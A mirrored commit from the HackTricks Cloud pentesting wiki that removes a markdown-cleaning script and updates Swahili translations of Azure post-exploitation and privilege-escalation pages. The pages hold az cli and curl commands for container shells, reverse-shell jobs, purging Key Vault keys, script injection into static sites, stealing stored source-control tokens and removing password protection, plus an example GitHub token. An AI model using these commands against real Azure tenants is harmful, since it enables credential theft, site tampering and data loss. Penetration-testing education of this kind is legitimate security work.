gitea-mirror/hacktricks-cloud
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks-cloud.git synced 2025-12-05 20:40:18 -08:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['src/pentesting-cloud/azure-security/az-post-exploitation/az

Browse Source
This commit is contained in:
Translator
2025-04-02 15:53:29 +00:00
parent a72f2e6192
commit 294541fc7d
5 changed files with 212 additions and 348 deletions
Download Patch File Download Diff File Expand all files Collapse all files

145
scripts/clean_for_ai.py
View File

@@ -1,145 +0,0 @@
import os
import re
import tempfile
def clean_and_merge_md_files(start_folder, exclude_keywords, output_file):
def clean_file_content(file_path):
"""Clean the content of a single file and return the cleaned lines."""
with open(file_path, "r", encoding="utf-8") as f:
content = f.readlines()
cleaned_lines = []
inside_hint = False
for i,line in enumerate(content):
# Skip lines containing excluded keywords
if any(keyword in line for keyword in exclude_keywords):
continue
# Detect and skip {% hint %} ... {% endhint %} blocks
if "{% hint style=\"success\" %}" in line and "Learn & practice" in content[i+1]:
inside_hint = True
if "{% endhint %}" in line:
inside_hint = False
continue
if inside_hint:
continue
# Skip lines with <figure> ... </figure>
if re.match(r"<figure>.*?</figure>", line):
continue
# Add the line if it passed all checks
cleaned_lines.append(line.rstrip())
# Remove excess consecutive empty lines
cleaned_lines = remove_consecutive_empty_lines(cleaned_lines)
return cleaned_lines
def remove_consecutive_empty_lines(lines):
"""Allow no more than one consecutive empty line."""
cleaned_lines = []
previous_line_empty = False
for line in lines:
if line.strip() == "":
if not previous_line_empty:
cleaned_lines.append("")
previous_line_empty = True
else:
cleaned_lines.append(line)
previous_line_empty = False
return cleaned_lines
def gather_files_in_order(start_folder):
"""Gather all .md files in a depth-first order."""
files = []
for root, _, filenames in os.walk(start_folder):
md_files = sorted([os.path.join(root, f) for f in filenames if f.endswith(".md")])
files.extend(md_files)
return files
# Gather files in depth-first order
all_files = gather_files_in_order(start_folder)
# Process files and merge into a single output
with open(output_file, "w", encoding="utf-8") as output:
for file_path in all_files:
# Clean the content of the file
cleaned_content = clean_file_content(file_path)
# Skip saving if the cleaned file has fewer than 10 non-empty lines
if len([line for line in cleaned_content if line.strip()]) < 10:
continue
# Get the name of the file for the header
file_name = os.path.basename(file_path)
# Write header, cleaned content, and 2 extra new lines
output.write(f"# {file_name}\n\n")
output.write("\n".join(cleaned_content))
output.write("\n\n")
def main():
# Specify the starting folder and output file
start_folder = os.getcwd()
output_file = os.path.join(tempfile.gettempdir(), "merged_output.md")
# Keywords to exclude from lines
exclude_keywords = [
"STM Cyber", # STM Cyber ads
"offer several valuable cybersecurity services", # STM Cyber ads
"and hack the unhackable", # STM Cyber ads
"blog.stmcyber.com", # STM Cyber ads
"RootedCON", # RootedCON ads
"rootedcon.com", # RootedCON ads
"the mission of promoting technical knowledge", # RootedCON ads
"Intigriti", # Intigriti ads
"intigriti.com", # Intigriti ads
"Trickest", # Trickest ads
"trickest.com", # Trickest ads,
"Get Access Today:",
"HACKENPROOF", # Hackenproof ads
"hackenproof.com", # Hackenproof ads
"HackenProof", # Hackenproof ads
"discord.com/invite/N3FrSbmwdy", # Hackenproof ads
"Hacking Insights:", # Hackenproof ads
"Engage with content that delves", # Hackenproof ads
"Real-Time Hack News:", # Hackenproof ads
"Keep up-to-date with fast-paced", # Hackenproof ads
"Latest Announcements:", # Hackenproof ads
"Stay informed with the newest bug", # Hackenproof ads
"start collaborating with top hackers today!", # Hackenproof ads
"discord.com/invite/N3FrSbmwdy", # Hackenproof ads
"Pentest-Tools", # Pentest-Tools.com ads
"pentest-tools.com", # Pentest-Tools.com ads
"perspective on your web apps, network, and", # Pentest-Tools.com ads
"report critical, exploitable vulnerabilities with real business impact", # Pentest-Tools.com ads
"SerpApi", # SerpApi ads
"serpapi.com", # SerpApi ads
"offers fast and easy real-time", # SerpApi ads
"plans includes access to over 50 different APIs for scraping", # SerpApi ads
"8kSec", # 8kSec ads
"academy.8ksec.io", # 8kSec ads
"Learn the technologies and skills required", # 8kSec ads
"WebSec", # WebSec ads
"websec.nl", # WebSec ads
"which means they do it all; Pentesting", # WebSec ads
]
# Clean and merge .md files
clean_and_merge_md_files(start_folder, exclude_keywords, output_file)
# Print the path to the output file
print(f"Merged content has been saved to: {output_file}")
if __name__ == "__main__":
# Execute this from the hacktricks folder to clean
# It will clean all the .md files and compile them into 1 in a proper order
main()

18
src/pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.md
View File

@@ -27,7 +27,7 @@ az keyvault certificate purge --vault-name <vault name> --name <certificate name
```
### **Microsoft.KeyVault/vaults/keys/encrypt/action**
Ruhusa hii inaruhusu mhusika kuficha data kwa kutumia funguo iliyohifadhiwa katika vault.
Ruhusa hii inaruhusu mhusika kuficha data kwa kutumia ufunguo uliohifadhiwa katika vault.
```bash
az keyvault key encrypt --vault-name <vault name> --name <key name> --algorithm <algorithm> --value <value>
@@ -46,7 +46,7 @@ az keyvault key decrypt --vault-name testing-1231234 --name testing --algorithm
```
### **Microsoft.KeyVault/vaults/keys/purge/action**
Ruhusa hii inaruhusu mtu mwenye mamlaka kufuta funguo kwa kudumu kutoka kwenye vault.
Ruhusa hii inaruhusu mhusika kufuta funguo kwa kudumu kutoka kwenye vault.
```bash
az keyvault key purge --vault-name <vault name> --name <key name>
```
@@ -64,26 +64,32 @@ az keyvault secret set --vault-name <vault name> --name <secret name> --value <s
```
### **Microsoft.KeyVault/vaults/certificates/delete**
Ruhusa hii inaruhusu kiongozi kufuta cheti kutoka kwenye vault. Cheti kinahamishwa kwenye hali ya "soft-delete", ambapo kinaweza kurejeshwa isipokuwa kimeondolewa kabisa.
Ruhusa hii inaruhusu mhusika kufuta cheti kutoka kwenye vault. Cheti kinahamishwa kwenye hali ya "soft-delete", ambapo kinaweza kurejeshwa isipokuwa kimeondolewa kabisa.
```bash
az keyvault certificate delete --vault-name <vault name> --name <certificate name>
```
### **Microsoft.KeyVault/vaults/keys/delete**
Ruhusa hii inaruhusu kiongozi kufuta funguo kutoka kwenye vault. Funguo inahamishwa kwenye hali ya "soft-delete", ambapo inaweza kurejeshwa isipokuwa ikifutwa.
Ruhusa hii inaruhusu mhusika kufuta funguo kutoka kwenye vault. Funguo inahamishwa kwenye hali ya "soft-delete", ambapo inaweza kurejeshwa isipokuwa ikifutwa.
```bash
az keyvault key delete --vault-name <vault name> --name <key name>
```
### **Microsoft.KeyVault/vaults/secrets/delete**
Ruhusa hii inaruhusu mhusika kufuta siri kutoka kwenye vault. Siri inahamishwa kwenye hali ya "soft-delete", ambapo inaweza kurejeshwa isipokuwa ikifutwa.
Ruhusa hii inaruhusu mhusika kufuta siri kutoka kwenye vault. Siri inahamishwa kwenye hali ya "soft-delete", ambapo inaweza kurejeshwa isipokuwa ikifutwa kabisa.
```bash
az keyvault secret delete --vault-name <vault name> --name <secret name>
```
### Microsoft.KeyVault/vaults/secrets/restore/action
Ruhusa hii inaruhusu mtu mwenye mamlaka kurejesha siri kutoka kwa nakala ya akiba.
Ruhusa hii inaruhusu mhusika kurejesha siri kutoka kwa nakala ya akiba.
```bash
az keyvault secret restore --vault-name <vault-name> --file <backup-file-path>
```
### Microsoft.KeyVault/vaults/keys/recover/action
Inaruhusu urejeleaji wa funguo iliyofutwa awali kutoka kwa Azure Key Vault
```bash
az keyvault secret recover --vault-name <vault-name> --name <secret-name>
```
{{#include ../../../banners/hacktricks-training.md}}

31
src/pentesting-cloud/azure-security/az-privilege-escalation/az-container-instances-apps-jobs-privesc.md
View File

@@ -14,13 +14,13 @@ Kwa maelezo zaidi angalia:
### `Microsoft.ContainerInstance/containerGroups/read`, `Microsoft.ContainerInstance/containerGroups/containers/exec/action`
Hizi ruhusa zinamruhusu mtumiaji **kutekeleza amri** katika kontena linaloendesha. Hii inaweza kutumika **kuinua mamlaka** katika kontena ikiwa ina kitambulisho chochote kinachosimamiwa kilichounganishwa. Bila shaka, pia inawezekana kufikia msimbo wa chanzo na taarifa nyingine yoyote nyeti iliyohifadhiwa ndani ya kontena.
Hizi ruhusa zinamruhusu mtumiaji **kutekeleza amri** katika kontena linalofanya kazi. Hii inaweza kutumika **kuinua mamlaka** katika kontena ikiwa ina kitambulisho kinachosimamiwa kilichounganishwa. Bila shaka, pia inawezekana kufikia msimbo wa chanzo na taarifa nyingine yoyote nyeti iliyohifadhiwa ndani ya kontena.
Ili kupata shell ni rahisi kama:
```bash
az container exec --name <container-name> --resource-group <res-group> --exec-command '/bin/sh'
```
Ni pia inawezekana **kusoma matokeo** ya kontena kwa:
Inawezekana pia **kusoma matokeo** ya kontena kwa:
```bash
az container attach --name <container-name> --resource-group <res-group>
```
@@ -49,7 +49,7 @@ az rest \
```
### `Microsoft.Resources/subscriptions/resourcegroups/read`, `Microsoft.ContainerInstance/containerGroups/write`, `Microsoft.ManagedIdentity/userAssignedIdentities/assign/action`
Hizi ruhusa zinaruhusu **kuunda au kusasisha kundi la kontena** lenye **utambulisho wa mtumiaji ulioendeshwa** nalo. Hii ni muhimu sana katika kupandisha mamlaka ndani ya kontena.
Hizi ruhusa zinaruhusu **kuunda au kusasisha kundi la kontena** lenye **utambulisho wa mtumiaji uliopewa usimamizi** ulioambatanishwa nalo. Hii ni muhimu sana kuongeza mamlaka katika kontena.
```bash
az container create \
--resource-group <res-group> \
@@ -61,13 +61,13 @@ az container create \
--cpu 1 \
--memory 1.0
```
Moreover, ni muhimu pia kuboresha kundi la kontena lililopo kwa kuongeza kwa mfano **`--command-line` argument** na shell ya kurudi.
Zaidi ya hayo, inawezekana pia kuboresha kundi la kontena lililopo kwa kuongeza kwa mfano **`--command-line` argument** yenye shell ya kurudi.
## ACA
### `Microsoft.App/containerApps/read`, `Microsoft.App/managedEnvironments/read`, `microsoft.app/containerapps/revisions/replicas`, `Microsoft.App/containerApps/revisions/read`, `Microsoft.App/containerApps/getAuthToken/action`
Hizi ruhusa zinamruhusu mtumiaji **kupata shell** katika kontena la programu linaloendesha. Hii inaweza kutumika **kuinua mamlaka** katika kontena ikiwa ina utambulisho wowote uliohifadhiwa. Bila shaka, pia inawezekana kufikia ms source code na taarifa nyingine yoyote nyeti iliyohifadhiwa ndani ya kontena.
Ruhusa hizi zinamruhusu mtumiaji **kupata shell** katika kontena la programu linalotembea. Hii inaweza kutumika **kuinua mamlaka** katika kontena ikiwa ina kitambulisho chochote kinachosimamiwa kilichounganishwa. Bila shaka, pia inawezekana kufikia ms source code na taarifa nyingine yoyote nyeti iliyohifadhiwa ndani ya kontena.
```bash
az containerapp exec --name <app-name> --resource-group <res-group> --command "sh"
az containerapp debug --name <app-name> --resource-group <res-group>
@@ -82,15 +82,15 @@ az containerapp secret show --name <app-name> --resource-group <res-group> --sec
```
### `Microsoft.App/containerApps/write`, `Microsoft.ManagedIdentity/userAssignedIdentities/assign/action`
Hizi ruhusa zinaruhusu **kuunganisha utambulisho wa mtumiaji ulioendeshwa** kwa programu ya kontena. Hii ni muhimu sana kuongeza mamlaka katika kontena. Kutekeleza hatua hii kutoka kwa az cli pia kunahitaji ruhusa `Microsoft.App/containerApps/listSecrets/action`.
Hizi ruhusa zinaruhusu **kuunganisha kitambulisho kinachosimamiwa na mtumiaji** kwa programu ya kontena. Hii ni muhimu sana kuongeza mamlaka katika kontena. Kutekeleza hatua hii kutoka kwa az cli pia kunahitaji ruhusa `Microsoft.App/containerApps/listSecrets/action`.
Ili kuunganisha utambulisho wa mtumiaji ulioendeshwa kwa kundi la kontena:
Ili kuunganisha kitambulisho kinachosimamiwa na mtumiaji kwa kundi la kontena:
```bash
az containerapp identity assign -n <app-name> -g <res-group> --user-assigned myUserIdentityName
```
### `Microsoft.App/containerApps/write`, `Microsoft.ManagedIdentity/userAssignedIdentities/assign/action`, `Microsoft.App/managedEnvironments/join/action`
Hizi ruhusa zinaruhusu **kuunda au kusasisha kontena la programu** lenye **utambulisho wa mtumiaji uliopewa usimamizi** ulioambatanishwa nalo. Hii ni muhimu sana katika kupandisha mamlaka ndani ya kontena.
Hizi ruhusa zinaruhusu **kuunda au kusasisha kontena la programu** lenye **utambulisho wa mtumiaji ulioendeshwa** ulioambatanishwa nalo. Hii ni muhimu sana kuongeza mamlaka katika kontena.
```bash
# Get environments
az containerapp env list --resource-group Resource_Group_1
@@ -106,13 +106,13 @@ az containerapp create \
--command "<reserse shell>"
```
> [!TIP]
> Kumbuka kwamba na ruhusa hizi **mipangilio mingine ya programu** inaweza kubadilishwa ambayo inaweza kuruhusu kufanya mashambulizi mengine ya privesc na post exploitation kulingana na mipangilio ya programu zilizopo.
> Kumbuka kwamba kwa ruhusa hizi **mipangilio mingine ya programu** inaweza kubadilishwa ambayo inaweza kuruhusu kufanya mashambulizi mengine ya privesc na post exploitation kulingana na mipangilio ya programu zilizopo.
## Jobs
### `Microsoft.App/jobs/read`, `Microsoft.App/jobs/write`
Ingawa kazi si za muda mrefu kama programu za kontena, unaweza kutumia uwezo wa kubadilisha mipangilio ya amri ya kazi wakati wa kuanzisha utekelezaji. Kwa kutengeneza kiolezo maalum cha kazi (kwa mfano, kubadilisha amri ya kawaida na shell ya kurudi), unaweza kupata ufikiaji wa shell ndani ya kontena linaloendesha kazi hiyo.
Ingawa kazi si za muda mrefu kama programu za kontena, unaweza kutumia uwezo wa kubadilisha mipangilio ya amri ya kazi unapozindua utekelezaji. Kwa kutengeneza kiolezo maalum cha kazi (kwa mfano, kubadilisha amri ya kawaida na shell ya kurudi), unaweza kupata ufikiaji wa shell ndani ya kontena linaloendesha kazi hiyo.
```bash
# Retrieve the current job configuration and save its template:
az containerapp job show --name <job-name> --resource-group <res-group> --output yaml > job-template.yaml
@@ -141,7 +141,7 @@ az containerapp job secret show --name <job-name> --resource-group <res-group> -
```
### `Microsoft.ManagedIdentity/userAssignedIdentities/assign/action`, `Microsoft.App/jobs/write`
Ikiwa una ruhusa ya kubadilisha usanidi wa kazi, unaweza kuunganisha utambulisho wa usimamizi uliopewa mtumiaji. Utambulisho huu unaweza kuwa na ruhusa za ziada (kwa mfano, ufikiaji wa rasilimali nyingine au siri) ambazo zinaweza kutumika vibaya kuongeza ruhusa ndani ya kontena.
Ikiwa una ruhusa ya kubadilisha usanidi wa kazi, unaweza kuunganisha utambulisho wa usimamizi uliopewa mtumiaji. Utambulisho huu unaweza kuwa na ruhusa za ziada (kwa mfano, ufikiaji wa rasilimali nyingine au siri) ambazo zinaweza kutumika vibaya ili kupandisha ruhusa ndani ya kontena.
```bash
az containerapp job update \
--name <job-name> \
@@ -150,7 +150,7 @@ az containerapp job update \
```
### `Microsoft.App/managedEnvironments/read`, `Microsoft.App/jobs/write`, `Microsoft.App/managedEnvironments/join/action`, `Microsoft.ManagedIdentity/userAssignedIdentities/assign/action`
Ikiwa unaweza kuunda Kazi mpya ya Container Apps (au kusasisha iliyopo) na kuambatisha kitambulisho kinachosimamiwa, unaweza kubuni kazi hiyo kutekeleza mzigo unaoongeza mamlaka. Kwa mfano, unaweza kuunda kazi mpya ambayo si tu inafanya kazi ya shell ya nyuma bali pia inatumia akidi za kitambulisho kinachosimamiwa kuomba tokeni au kufikia rasilimali nyingine.
Ikiwa unaweza kuunda Kazi mpya ya Mifuko ya Kontena (au kusasisha iliyopo) na kuunganisha kitambulisho kinachosimamiwa, unaweza kubuni kazi hiyo kutekeleza mzigo unaoongeza mamlaka. Kwa mfano, unaweza kuunda kazi mpya ambayo si tu inafanya kazi ya shell ya kurudi bali pia inatumia akidi za kitambulisho kinachosimamiwa kuomba tokeni au kufikia rasilimali nyingine.
```bash
az containerapp job create \
--name <new-job-name> \
@@ -169,9 +169,14 @@ az containerapp job create \
### `microsoft.app/jobs/start/action`, `microsoft.app/jobs/read`
Inaonekana kwamba kwa ruhusa hizi inapaswa kuwa inawezekana kuanzisha kazi. Hii inaweza kutumika kuanzisha kazi na shell ya kurudi au amri nyingine yoyote mbaya bila kuhitaji kubadilisha usanidi wa kazi.
Inaonekana kwamba kwa ruhusa hizi inapaswa kuwa inawezekana kuanzisha kazi. Hii inaweza kutumika kuanzisha kazi yenye shell ya kurudi au amri nyingine yoyote mbaya bila kuhitaji kubadilisha usanidi wa kazi.
Sijafanikiwa kuifanya ifanye kazi lakini kulingana na vigezo vilivyokubaliwa inapaswa kuwa inawezekana.
### Microsoft.ContainerInstance/containerGroups/restart/action
Inaruhusu kuanzisha upya kundi maalum la kontena ndani ya Azure Container Instances.
```bash
az container restart --resource-group <resource-group> --name <container-instances>
```
{{#include ../../../banners/hacktricks-training.md}}

330
src/pentesting-cloud/azure-security/az-privilege-escalation/az-static-web-apps-privesc.md
View File

@@ -4,7 +4,7 @@
## Azure Static Web Apps
For more information about this service check:
Kwa maelezo zaidi kuhusu huduma hii angalia:
{{#ref}}
../az-services/az-static-web-apps.md
@@ -12,164 +12,153 @@ For more information about this service check:
### Microsoft.Web/staticSites/snippets/write
It's possible to make a static web page load arbitary HTML code by creating a snippet. This could allow an attacker to inject JS code inside the web app and steal sensitive information such as credentials or mnemonic keys (in web3 wallets).
The fllowing command create an snippet that will always be loaded by the web app::
Inawezekana kufanya ukurasa wa wavuti wa static upakue msimbo wa HTML wa kiholela kwa kuunda snippet. Hii inaweza kumruhusu mshambuliaji kuingiza msimbo wa JS ndani ya programu ya wavuti na kuiba taarifa nyeti kama vile akidi au funguo za mnemonic (katika pochi za web3).
Amri ifuatayo inaunda snippet ambayo itakuwa inapakuliwa kila wakati na programu ya wavuti::
```bash
az rest \
--method PUT \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/staticSites/<app-name>/snippets/<snippet-name>?api-version=2022-03-01" \
--headers "Content-Type=application/json" \
--body '{
"properties": {
"name": "supersnippet",
"location": "Body",
"applicableEnvironmentsMode": "AllEnvironments",
"content": "PHNjcmlwdD4KYWxlcnQoIkF6dXJlIFNuaXBwZXQiKQo8L3NjcmlwdD4K",
"environments": [],
"insertBottom": false
}
}'
--method PUT \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/staticSites/<app-name>/snippets/<snippet-name>?api-version=2022-03-01" \
--headers "Content-Type=application/json" \
--body '{
"properties": {
"name": "supersnippet",
"location": "Body",
"applicableEnvironmentsMode": "AllEnvironments",
"content": "PHNjcmlwdD4KYWxlcnQoIkF6dXJlIFNuaXBwZXQiKQo8L3NjcmlwdD4K",
"environments": [],
"insertBottom": false
}
}'
```
### Soma Akikodi za Watu wa Tatu Zilizowekwa
### Read Configured Third Party Credentials
As explained in the App Service section:
Kama ilivyoelezwa katika sehemu ya App Service:
{{#ref}}
../az-privilege-escalation/az-app-services-privesc.md
{{#endref}}
Running the following command it's possible to **read the third party credentials** configured in the current account. Note that if for example some Github credentials are configured in a different user, you won't be able to access the token from a different one.
Kukimbia amri ifuatayo inawezekana **kusoma akidi za watu wa tatu** zilizowekwa katika akaunti ya sasa. Kumbuka kwamba ikiwa kwa mfano akidi za Github zimewekwa kwa mtumiaji tofauti, huwezi kupata token kutoka kwa mwingine.
```bash
az rest --method GET \
--url "https://management.azure.com/providers/Microsoft.Web/sourcecontrols?api-version=2024-04-01"
--url "https://management.azure.com/providers/Microsoft.Web/sourcecontrols?api-version=2024-04-01"
```
Amri hii inarudisha tokeni za Github, Bitbucket, Dropbox na OneDrive.
This command returns tokens for Github, Bitbucket, Dropbox and OneDrive.
Here you have some command examples to check the tokens:
Hapa kuna mifano ya amri za kuangalia tokeni:
```bash
# GitHub List Repositories
curl -H "Authorization: token <token>" \
-H "Accept: application/vnd.github.v3+json" \
https://api.github.com/user/repos
-H "Accept: application/vnd.github.v3+json" \
https://api.github.com/user/repos
# Bitbucket List Repositories
curl -H "Authorization: Bearer <token>" \
-H "Accept: application/json" \
https://api.bitbucket.org/2.0/repositories
-H "Accept: application/json" \
https://api.bitbucket.org/2.0/repositories
# Dropbox List Files in Root Folder
curl -X POST https://api.dropboxapi.com/2/files/list_folder \
-H "Authorization: Bearer <token>" \
-H "Content-Type: application/json" \
--data '{"path": ""}'
-H "Authorization: Bearer <token>" \
-H "Content-Type: application/json" \
--data '{"path": ""}'
# OneDrive List Files in Root Folder
curl -H "Authorization: Bearer <token>" \
-H "Accept: application/json" \
https://graph.microsoft.com/v1.0/me/drive/root/children
-H "Accept: application/json" \
https://graph.microsoft.com/v1.0/me/drive/root/children
```
### Overwrite file - Overwrite routes, HTML, JS...
It's possible to **overwrite a file inside the Github repo** containing the app through Azure having the **Github token** sending a request such as the following which will indicate the path of the file to overwrite, the content of the file and the commit message.
Ni uwezekano wa **kuandika upya faili ndani ya repo ya Github** inayoshikilia programu kupitia Azure kwa kutumia **Github token** kutuma ombi kama ifuatavyo ambalo litabainisha njia ya faili ya kuandika upya, maudhui ya faili na ujumbe wa commit.
This can be abused by attackers to basically **change the content of the web app** to serve malicious content (steal credentials, mnemonic keys...) or just to **re-route certain paths** to their own servers by overwriting the `staticwebapp.config.json` file.
Hii inaweza kutumiwa vibaya na washambuliaji kubadilisha **maudhui ya programu ya wavuti** ili kutoa maudhui mabaya (kuiba akidi, funguo za mnemonic...) au tu **kuhamasisha njia fulani** kwa seva zao wenyewe kwa kuandika upya faili ya `staticwebapp.config.json`.
> [!WARNING]
> Note that if an attacker manages to compromise the Github repo in any way, they can also overwrite the file directly from Github.
> Kumbuka kwamba ikiwa mshambuliaji atafanikiwa kuharibu repo ya Github kwa njia yoyote, wanaweza pia kuandika upya faili moja kwa moja kutoka Github.
```bash
curl -X PUT "https://functions.azure.com/api/github/updateGitHubContent" \
-H "Content-Type: application/json" \
-d '{
"commit": {
"message": "Update static web app route configuration",
"branchName": "main",
"committer": {
"name": "Azure App Service",
"email": "donotreply@microsoft.com"
},
"contentBase64Encoded": "ewogICJuYXZpZ2F0aW9uRmFsbGJhY2siOiB7CiAgICAicmV3cml0ZSI6ICIvaW5kZXguaHRtbCIKICB9LAogICJyb3V0ZXMiOiBbCiAgICB7CiAgICAgICJyb3V0ZSI6ICIvcHJvZmlsZSIsCiAgICAgICJtZXRob2RzIjogWwogICAgICAgICJnZXQiLAogICAgICAgICJoZWFkIiwKICAgICAgICAicG9zdCIKICAgICAgXSwKICAgICAgInJld3JpdGUiOiAiL3AxIiwKICAgICAgInJlZGlyZWN0IjogIi9sYWxhbGEyIiwKICAgICAgInN0YXR1c0NvZGUiOiAzMDEsCiAgICAgICJhbGxvd2VkUm9sZXMiOiBbCiAgICAgICAgImFub255bW91cyIKICAgICAgXQogICAgfQogIF0KfQ==",
"filePath": "staticwebapp.config.json",
"message": "Update static web app route configuration",
"repoName": "carlospolop/my-first-static-web-app",
"sha": "4b6165d0ad993a5c705e8e9bb23b778dff2f9ca4"
},
"gitHubToken": "gho_1OSsm834ai863yKkdwHGj31927PCFk44BAXL"
"commit": {
"message": "Update static web app route configuration",
"branchName": "main",
"committer": {
"name": "Azure App Service",
"email": "donotreply@microsoft.com"
},
"contentBase64Encoded": "ewogICJuYXZpZ2F0aW9uRmFsbGJhY2siOiB7CiAgICAicmV3cml0ZSI6ICIvaW5kZXguaHRtbCIKICB9LAogICJyb3V0ZXMiOiBbCiAgICB7CiAgICAgICJyb3V0ZSI6ICIvcHJvZmlsZSIsCiAgICAgICJtZXRob2RzIjogWwogICAgICAgICJnZXQiLAogICAgICAgICJoZWFkIiwKICAgICAgICAicG9zdCIKICAgICAgXSwKICAgICAgInJld3JpdGUiOiAiL3AxIiwKICAgICAgInJlZGlyZWN0IjogIi9sYWxhbGEyIiwKICAgICAgInN0YXR1c0NvZGUiOiAzMDEsCiAgICAgICJhbGxvd2VkUm9sZXMiOiBbCiAgICAgICAgImFub255bW91cyIKICAgICAgXQogICAgfQogIF0KfQ==",
"filePath": "staticwebapp.config.json",
"message": "Update static web app route configuration",
"repoName": "carlospolop/my-first-static-web-app",
"sha": "4b6165d0ad993a5c705e8e9bb23b778dff2f9ca4"
},
"gitHubToken": "gho_1OSsm834ai863yKkdwHGj31927PCFk44BAXL"
}'
```
### Microsoft.Web/staticSites/config/write
### Microsoft.Web/staticSites/config/write
With this permission, it's possible to **modify the password** protecting a static web app or even unprotect every environment by sending a request such as the following:
Kwa ruhusa hii, inawezekana **kubadilisha nenosiri** linalolinda programu ya wavuti ya statiki au hata kuondoa ulinzi wa kila mazingira kwa kutuma ombi kama ifuatavyo:
```bash
# Change password
az rest --method put \
--url "/subscriptions/<subcription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/staticSites/<app-name>/config/basicAuth?api-version=2021-03-01" \
--headers 'Content-Type=application/json' \
--body '{
"name": "basicAuth",
"type": "Microsoft.Web/staticSites/basicAuth",
"properties": {
"password": "SuperPassword123.",
"secretUrl": "",
"applicableEnvironmentsMode": "AllEnvironments"
}
"name": "basicAuth",
"type": "Microsoft.Web/staticSites/basicAuth",
"properties": {
"password": "SuperPassword123.",
"secretUrl": "",
"applicableEnvironmentsMode": "AllEnvironments"
}
}'
# Remove the need of a password
az rest --method put \
--url "/subscriptions/<subcription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/staticSites/<app-name>/config/basicAuth?api-version=2021-03-01" \
--headers 'Content-Type=application/json' \
--body '{
"name": "basicAuth",
"type": "Microsoft.Web/staticSites/basicAuth",
"properties": {
"secretUrl": "",
"applicableEnvironmentsMode": "SpecifiedEnvironments",
"secretState": "None"
}
"name": "basicAuth",
"type": "Microsoft.Web/staticSites/basicAuth",
"properties": {
"secretUrl": "",
"applicableEnvironmentsMode": "SpecifiedEnvironments",
"secretState": "None"
}
}'
```
### Microsoft.Web/staticSites/listSecrets/action
This permission allows to get the **API key deployment token** for the static app:
Ruhusa hii inaruhusu kupata **API key deployment token** kwa ajili ya programu ya static:
```bash
az rest --method POST \
--url "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.Web/staticSites/<app-name>/listSecrets?api-version=2023-01-01"
```
Kisha, ili **kusasisha programu kwa kutumia tokeni** unaweza kukimbia amri ifuatayo. Kumbuka kwamba amri hii ilipatikana kwa kuangalia **jinsi Github Action [https://github.com/Azure/static-web-apps-deploy](https://github.com/Azure/static-web-apps-deploy) inavyofanya kazi**, kwani ndiyo ambayo Azure imeweka kama chaguo-msingi kutumika. Hivyo picha na mipangilio inaweza kubadilika katika siku zijazo.
Then, in order to **update an app using the token** you could run the following command. Note that this command was extracted checking **how to Github Action [https://github.com/Azure/static-web-apps-deploy](https://github.com/Azure/static-web-apps-deploy) works**, as it's the one Azure set by default ot use. So the image and paarements could change in the future.
1. Download the repo [https://github.com/staticwebdev/react-basic](https://github.com/staticwebdev/react-basic) (or any other repo you want to deploy) and run `cd react-basic`.
2. Change the code you want to deploy
3. Deploy it running (Remember to change the `<api-token>`):
> [!TIP]
> Ili kupeleka programu unaweza kutumia zana **`swa`** kutoka [https://azure.github.io/static-web-apps-cli/docs/cli/swa-deploy#deployment-token](https://azure.github.io/static-web-apps-cli/docs/cli/swa-deploy#deployment-token) au kufuata hatua zifuatazo:
1. Pakua repo [https://github.com/staticwebdev/react-basic](https://github.com/staticwebdev/react-basic) (au repo nyingine yoyote unayotaka kupeleka) na ukimbie `cd react-basic`.
2. Badilisha msimbo unayotaka kupeleka
3. Ipeleke ukikimbia (Kumbuka kubadilisha `<api-token>`):
```bash
docker run --rm -v $(pwd):/mnt mcr.microsoft.com/appsvc/staticappsclient:stable INPUT_AZURE_STATIC_WEB_APPS_API_TOKEN=<api-token> INPUT_APP_LOCATION="/mnt" INPUT_API_LOCATION="" INPUT_OUTPUT_LOCATION="build" /bin/staticsites/StaticSitesClient upload --verbose
```
>[!WARNING]
> Even if you have the token you won't be able to deploy the app if the **Deployment Authorization Policy** is set to **Github**. For using the token you will need the permission `Microsoft.Web/staticSites/write` to change the deployment method to use th APi token.
> [!WARNING]
> Hata kama una token, huwezi kupeleka programu ikiwa **Sera ya Uidhinishaji wa Upelekaji** imewekwa kwenye **Github**. Ili kutumia token, utahitaji ruhusa `Microsoft.Web/staticSites/write` kubadilisha njia ya upelekaji kutumia token ya APi.
### Microsoft.Web/staticSites/write
With this permission it's possible to **change the source of the static web app to a different Github repository**, however, it won't be automatically provisioned as this must be done from a Github Action.
Kwa ruhusa hii inawezekana **kubadilisha chanzo cha programu ya wavuti ya statiki kuwa hifadhi tofauti ya Github**, hata hivyo, haitapelekwa kiotomatiki kwani hii inapaswa kufanywa kutoka kwa Kitendo cha Github.
However, if the **Deployment Authotization Policy** is set to **Github**, it's possible to **update the app from the new source repository!**.
In case the **Deployment Authorization Policy** is not set to Github, you can change it with the same permission `Microsoft.Web/staticSites/write`.
Hata hivyo, ikiwa **Sera ya Uidhinishaji wa Upelekaji** imewekwa kwenye **Github**, inawezekana **kusaidia programu kutoka kwenye hifadhi mpya ya chanzo!**.
Iwapo **Sera ya Uidhinishaji wa Upelekaji** haijawekwa kwenye Github, unaweza kuibadilisha kwa ruhusa ile ile `Microsoft.Web/staticSites/write`.
```bash
# Change the source to a different Github repository
az staticwebapp update --name my-first-static-web-app --resource-group Resource_Group_1 --source https://github.com/carlospolop/my-first-static-web-app -b main
@@ -179,117 +168,110 @@ az rest --method PATCH \
--url "https://management.azure.com/subscriptions/<subscription-id>>/resourceGroups/<res-group>/providers/Microsoft.Web/staticSites/<app-name>?api-version=2022-09-01" \
--headers 'Content-Type=application/json' \
--body '{
"properties": {
"allowConfigFileUpdates": true,
"stagingEnvironmentPolicy": "Enabled",
"buildProperties": {
"appLocation": "/",
"apiLocation": "",
"appArtifactLocation": "build"
},
"deploymentAuthPolicy": "GitHub",
"repositoryToken": "<github_token>" # az rest --method GET --url "https://management.azure.com/providers/Microsoft.Web/sourcecontrols?api-version=2024-04-01"
}
"properties": {
"allowConfigFileUpdates": true,
"stagingEnvironmentPolicy": "Enabled",
"buildProperties": {
